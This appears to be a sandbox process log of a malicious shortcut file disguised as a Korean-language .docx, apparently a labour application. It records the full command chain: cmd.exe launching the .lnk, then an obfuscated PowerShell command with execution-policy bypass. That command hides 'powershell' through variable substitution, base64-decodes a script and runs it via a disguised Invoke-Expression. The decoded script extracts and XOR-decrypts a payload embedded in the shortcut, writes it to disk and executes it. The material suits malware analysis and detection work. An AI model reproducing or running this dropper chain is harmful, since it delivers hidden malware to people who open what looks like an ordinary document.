cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "SvDjmYYOk" "C:\Users\test22\AppData\Local\Temp\근로신청서 관련의 건.docx.lnk"
2640cmd.exe "C:\windows\system32\cmd.exe" /c set s=posuiheihcksuehhfhell & call %s:suiheihcksuehhf=wers% -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;
2756powershell.exe powershell -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;
2852